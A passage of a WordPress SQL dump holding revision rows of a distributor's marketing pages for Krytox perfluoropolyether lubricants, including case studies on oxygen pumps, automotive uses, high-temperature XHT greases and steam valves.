'https://www.miller-stephenson.com/2442-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2591, 2, '2016-10-12 19:51:18', '2016-10-12 19:51:18', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Products:</strong>\r\n\r\n[product id="954"][product id="944"][product id="943"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-12 19:51:18', '2016-10-12 19:51:18', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2592, 2, '2016-10-12 19:52:10', '2016-10-12 19:52:10', '<h1><strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong></h1>\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ automotive lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n<h4><strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong></h4>\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n<h4><strong>Longer Lasting Lubrication</strong></h4>\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n<h4><strong>The Right Choice for Your Design Challenge</strong></h4>\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n<h4><strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong></h4>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<h4><strong>The Right Choice for Our Environment</strong></h4>\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n<h4><strong>Effective Over a Wide Temperature Range</strong></h4>\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT AC</a></td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Compatibility with Elastomers and Plastics</strong></h4>\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<h4><strong>Compatibility with Metals</strong></h4>\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n<h4><strong>Robust Electrical Properties</strong></h4>\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n<h4><strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong></h4>\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n<h4><strong>Cost-Effective</strong></h4>\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n<h4><strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong></h4>\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n<h4><strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong></h4>\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n<h4><strong>The following Krytox lubricants are great automotive lubricants:</strong></h4>\r\n[ux_product_categories ids="96,98,97,37,168" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-12 19:52:10', '2016-10-12 19:52:10', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2593, 2, '2016-10-12 19:52:13', '2016-10-12 19:52:13', '<h1><strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox™ XHT</strong></h1>\r\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\r\nlubricant properties are often found inadequate for critical systems where failure is not an option. Krytox™ XHT greases and oils help alleviate these issues.\r\n\r\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\r\n\r\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\r\nlost production.\r\n\r\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox™, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\r\n<h4><strong>What are Krytox™ XHT lubricants?</strong></h4>\r\nKrytox™ XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox™ the most robust family of lubricants available.\r\n<h4><strong>SOLUTION: Krytox™ XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong></h4>\r\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox™ lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\r\n\r\nKrytox™ XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox™, a standard lithium-thickened mineral oil was\r\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox™ XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\r\nmonths and look to be in excellent condition. Using Krytox™ has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\r\n\r\nKrytox™ XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox™ XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\r\n<h4><strong>PERFORMANCE: Krytox™ XHT—The lubricant for hot, hot, hot applications</strong></h4>\r\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety is increased, because there is less time spent around hot equipment.\r\n\r\nKrytox™ XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox™ XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\r\n\r\n[ux_product_categories ids="115,116" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox™ XHT.\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-revision-v1', '', '', '2016-10-12 19:52:13', '2016-10-12 19:52:13', '', 2375, 'https://www.miller-stephenson.com/2375-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2594, 2, '2016-10-12 19:53:06', '2016-10-12 19:53:06', '<strong>Krytox Steam Control Valve Lubricant</strong>\r\n\r\n<strong>Krytox grease meets the need for a continuous lubrication cycle.</strong>\r\n\r\n<strong>Steam control valve lubricant application at a geothermal power plant</strong>\r\n\r\nThe power plant, located in Iceland, utilizes hot steam from the earth, containing 1–4% gas, mostly carbon dioxide and hydrogen disulfide, in temperatures ranging from 120–200 ºC (248–392 °F). A standard hydrocarbon-based grease was unsatisfactory for lubricating bushings for valves that control the flow of high temperature steam containing corrosive gases.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe geothermal power plant needed a steam control valve lubricant that:\r\n<ul>\r\n 	<li>Is able to withstand presence of acidic gases in high temperature steam</li>\r\n 	<li>Has low friction for accurate control of the valve position</li>\r\n 	<li>Can work in a self-greasing system</li>\r\n</ul>\r\n<img class="alignnone wp-image-2323" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Steam-Control-Valve-800x331.jpg" alt="steam-control-valve" width="682" height="282" />\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox GPL 206 grease met the challenge for lubrication of the steam valve bushing. It provided the low static friction and no stick-slip that is required for accurate position control. Krytox GPL 206, like all Krytox oils and greases, can withstand very high temperatures, is nonflammable, inert, and has a low environmental footprint. The power plant now enjoys reduced maintenance, thanks to high performance Krytox lubricants—standing up to tough conditions.\r\n\r\n<strong>Other Valve Applications</strong>\r\n<ul>\r\n 	<li>Any valve-handling that could react with, degrade, or dissolve standard lubricants. Examples include:</li>\r\n 	<li>Steam</li>\r\n 	<li>Aggressive/reactive gases</li>\r\n 	<li>Chemicals</li>\r\n</ul>\r\nFluorinated lubricants from Chemours can also be used successfully in other types of applications. These synthetic oils and greases are ideal for many conditions, such as:\r\n<ul>\r\n 	<li>Continuous high temperatures up to 288ºC (550 °F)</li>\r\n 	<li>Use around hazardous chemicals</li>\r\n 	<li>Need for low friction coefficient</li>\r\n 	<li>Where flammability is a concern, including reactive gases and oxygen service</li>\r\n</ul>\r\n[product id="790"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Learn more about the Krytox GPL 206 here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox For Steam Control Valves', '', 'inherit', 'closed', 'closed', '', '2322-revision-v1', '', '', '2016-10-12 19:53:06', '2016-10-12 19:53:06', '', 2322, 'https://www.miller-stephenson.com/2322-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2595, 2, '2016-10-12 19:53:11', '2016-10-12 19:53:11', '<h4><strong>Which Krytox product is right for your application?</strong></h4>\r\nKrytox product(s) are perfluoropolyether oils and greases are available in a variety of grades for many types of applications. This Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found. “Krytox Performance Lubricants Product Overview” gives basic information about all of the grades.\r\n\r\nTypical Krytox product lubricant applications include: paint plant conveyor bearings, corrugator and paper machine bearings, robotics, welding machines, high temperature fans, textile equipment, tenter frames, high temperature ovens, conveyor systems in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, valve lubrication, ventilation fan bearings, rod mills, valves, valve actuators, automobile\r\nalternators, viscous fan clutches, pumps, sealed-forlife bearings, critical equipment where failure cannot be tolerated, and severe service applications.\r\n<h4><strong>Krytox General-Purpose Oils and Greases</strong></h4>\r\nThe Krytox GPL 10X oil /20X grease series contains no additives and can be used on components that may come in contact with all chemicals, including acids, bases, solvents, and other reactive chemicals. Typical applications include valves, bearings, seal barrier fluids, instruments, and oxygen systems.\r\n\r\nThe Krytox GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications.\r\n\r\nThe Krytox GPL 22X series contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments. Typical applications include automotive bearings, sealed pump bearings, electric motor bearings, and general-purpose bearings.\r\n\r\nKrytox GPL 29X greases have EP and anti-corrosion additives, and have been formulated for applications that need both high load carrying capacity and anti-corrosion protection. For additional information, refer to “Krytox Lubricants for Extreme Pressure Applications with Anti- Corrosion Additives.”\r\n\r\nKrytox GPL 2EX lubricants are formulated using new antirust additives. This grease is similar to Krytox GPL 22X series greases, but contains a non-nitrite anti-corrosion additive. For further information, refer to “Krytox Extra High Temperature (XHT) Products.”\r\n<h4><strong>Krytox Lubricants for Aerospace Applications</strong></h4>\r\nKrytox 143 series oils are clear, colorless, fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and are long lasting.\r\n\r\nKrytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but in a grease form. Krytox 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specification.\r\n<h4><strong>Krytox Vacuum Pump Fluids</strong></h4>\r\nKrytox vacuum pump fluids are used in vacuum pumps and vacuum systems where controlled vapor pressure, nonflammability, and non-reactivity are needed. Krytox vacuum pump fluids can be regenerated and reused.\r\n<h4><strong>Krytox Extra High Temperature Products</strong></h4>\r\nKrytox XHT- S and XHT-SX greases are high temperature greases. These greases are designed to work best at temperatures over 204 °C (400 °F), but below 300 °C (572 °F). For more specific information, refer to\r\n“Krytox XHT Grease.”\r\n\r\nKrytox XHT- AC and XHT-ACX greases are high temperature greases that contain anti-corrosion/anti-wear inhibitors. These greases are designed to work best at temperatures over 204 °C (400 °F), but under 300 °C (572 °F).\r\n\r\nKrytox XHT- BD, XHT-BDX, and XHT-BDZ greases are designed for use where temperatures are in the 288–399 °C (550–750 °F) range and there is a danger of melting the standard PTFE thickener. 